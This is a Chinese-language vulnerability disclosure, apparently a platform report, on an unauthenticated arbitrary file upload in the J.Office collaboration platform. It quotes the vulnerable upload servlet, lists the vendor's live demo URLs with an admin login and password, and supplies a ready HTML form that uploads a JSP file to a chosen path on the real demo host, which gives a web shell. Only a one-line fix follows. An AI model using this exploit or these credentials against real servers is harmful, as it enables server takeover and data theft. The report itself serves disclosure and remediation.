无需登录 任意文件上传可getshell
官网

http://www.jee-soft.cn/htsite/index.html

产品

J.Office 协同办公开发平台

产品介绍

http://www.jee-soft.cn/htsite/html/cpjfw/cpzx/2012/06/12/1339484245731.html

成功案例
 

存在任意文件上传 demo站也测试成功了



J.Office在线试用地址：

电信:http://office.jee-soft.cn:8080/index.jsp

网通:http://oa.jee-soft.cn:8080/index.jsp

账号:admin

密码:1



产品开源可下载分析
 

http://www.jee-soft.cn/htsite/page/platformProduct/getProductList.ht

找demo站进行测试吧



地址

http://office.jee-soft.cn:8080/jasper-upload

主要处理代码如下
 

protected void doPost(HttpServletRequest req, HttpServletResponse resp)
    throws ServletException, IOException
  {
    req.setCharacterEncoding("UTF-8");
    resp.setCharacterEncoding("UTF-8");
    try
    {
      DiskFileItemFactory factory = new DiskFileItemFactory();

      factory.setSizeThreshold(4096);
      factory.setRepository(new File(this.tempPath));
      ServletFileUpload fu = new ServletFileUpload(factory);

      List fileItems = fu.parseRequest(req);

      for (FileItem fi : fileItems) {
        if ("file_cat".equals(fi.getFieldName())) {
          this.fileCat = fi.getString(); //
        }

        if ("file_path".equals(fi.getFieldName())) {
          this.filePath = fi.getString();//获取文本域的值 上传文件路径可以自己控制
        }
      }

      Iterator i = fileItems.iterator();

      while (i.hasNext())
      {
        FileItem fi = (FileItem)i.next();
        String fileContentType = fi.getContentType();
        if (fileContentType == null) {
          continue;
        }
        if (fi.getContentType() == null)
        {
          continue;
        }

        String path = fi.getName();

        int start = path.lastIndexOf("\\");

        String fileName = path.substring(start + 1);

        String relativeFullPath = null;
        String generName = FileUtil.generateFilename(fileName); //随机生成文件名 没大碍 不是关键

        int sindex = generName.lastIndexOf("/");
        int eindex = generName.lastIndexOf(".");
        String generDir = generName.substring(sindex + 1, eindex);

        generName = generName.substring(0, sindex) + "/" + generDir + 
          "/" + 
          generName.substring(sindex + 1, generName.length());

        if (!"".equals(this.filePath)) //这里关键 filepath可以控制 不要为空
          relativeFullPath = this.filePath; //走这一步 就不用管随机生成的文件名是什么了
        else {
          relativeFullPath = this.fileCat + "/" + generName;
        }

        int index = relativeFullPath.lastIndexOf("/");

        File dirPath = new File(this.uploadPath + "/" + 
          relativeFullPath.substring(0, index + 1));

        if (!dirPath.exists()) { //目录不存在可创建
          dirPath.mkdirs();
        }

        File temFile = new File(this.uploadPath + "/" + relativeFullPath); //filepath可以控制 使得任意文件上传
        fi.write(temFile); //写文件了 
//后面的就不用看了

      .........

很明显的任意文件上传
 

可利用代码
 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>upload</title>
</head>
<body>
<form method="post" action="http://office.jee-soft.cn:8080/jasper-upload" enctype="multipart/form-data" >
<input type="file" name="file" />

<input type="hidden" name="file_cat" value="a" />
<input type="hidden" name="file_path" value="temp/2.jsp" /> 

<input type="submit" name="tijiao"  value="confirm"/>

</form>
</body>
</html>

上传后文件路径是

http://office.jee-soft.cn:8080/attachFiles/temp/2.jsp

 

 

 

 

修复方案：

对filepath写死 防止用户设置 对文件名进行判断